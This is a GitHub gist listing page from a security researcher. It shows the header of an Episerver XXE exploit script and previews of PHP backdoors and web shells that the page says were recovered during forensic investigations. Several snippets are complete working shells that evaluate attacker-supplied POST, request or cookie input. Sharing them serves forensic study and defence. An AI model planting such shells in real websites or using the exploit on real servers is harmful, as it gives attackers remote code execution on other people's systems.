jonaslejon’s gists

jonaslejon / gist:229e96e45bcb527cdf63b8ee930687af

Last active February 17, 2020 08:21

RSA PGP key for [email protected]

	-----BEGIN PGP PUBLIC KEY BLOCK-----

	mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A
	WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k
	j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s
	gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU
	3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9
	Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE
	5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG
	cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+

jonaslejon / dns-resolvers.txt

Last active June 25, 2018 19:52

DNS Resolvers with tcpdump output

jonaslejon / episploit.py

Last active October 5, 2020 01:00

Episerver XXE Vulnerability - Exploit Episploit

	#!/usr/bin/python
	##
	## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
	##
	## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
	##
	## Written by Jonas Lejon 2017-12-19 <[email protected]> https://triop.se
	## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
	##
	## Usage: ./episploit.py <target> [file-to-read]

jonaslejon / wp-uninstall.php

Created April 8, 2018 19:16

WordPress backdoor found in file wp-uninstall.php

	error_reporting(0);
	if (!isset($_SESSION['bajak'])) {
	$visitcount = 0;
	$web = $_SERVER["HTTP_HOST"];
	$inj = $_SERVER["REQUEST_URI"];
	$body = "ada yang inject \n$web$inj";
	$safem0de = @ini_get('safe_mode');
	if (!$safem0de) {$security= "SAFE_MODE = OFF";}
	else {$security= "SAFE_MODE = ON";};
	$serper=gethostbyname($_SERVER['SERVER_ADDR']);

jonaslejon / _input__test.php.

Created October 10, 2017 18:58

WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/

	<?php
	/**
	* @package Joomla.Plugin.System
	* @since 1.5
	*
	*
	*/
	class PluginJoomla {
	public function __construct() {
	$jq = @$_COOKIE['ContentJQ3'];

jonaslejon / wp-blog-header.php

Last active July 7, 2018 14:38

Malware found on WordPress installation. This is the deobfuscated version

	<?php @error_reporting(0);
	define('cdomainDosNZ', "ssl-backup24.com");
	define('showop_phpDosNZ', "showop_click.php");
	define('info_phpDosNZ', 'info.php');
	if (array_key_exists('HTTP_TEST', $_SERVER)) {
	echo (md5("TEST2016_CLICK"));
	exit;
	}
	function fetch_urlDosNZ($url, $data) {
	$content = '';

jonaslejon / file-upload.php

Created February 10, 2016 20:19

PHP file upload backdoor

	<?php
	$self = $_SERVER['PHP_SELF'];
	$docr = $_SERVER['DOCUMENT_ROOT'];
	$sern = $_SERVER['SERVER_NAME'];
	$tend = "</tr></form></table><br><br><br><br>";
	if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
	elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
	else {$ac = "upload";}
	switch($ac) {
	case "upload":

jonaslejon / php-preg-replace-backdoor.php

Created February 10, 2016 20:11

Short PHP backdoor using preg_replace. Found during forensic investigation

<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');

jonaslejon / PHP-cookie-backdoor.php

Last active February 27, 2023 05:10

This is a PHP COOKIE backdoor that was found during a forensic investigation

jonaslejon / web-backdoor.php

Created January 11, 2016 17:01

Web PHP Malware found during forensic investigation

	<?php

	eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%

	<?php

	$ecp=$_COOKIE;
	$llm=$ecp[inwm];
	if($llm){
	$zkm=$llm($ecp[xlvd]);$ewgp=$llm($ecp[avkw]);$uxt=$zkm("",$ewgp);$uxt();
	}

Jonas Lejon jonaslejon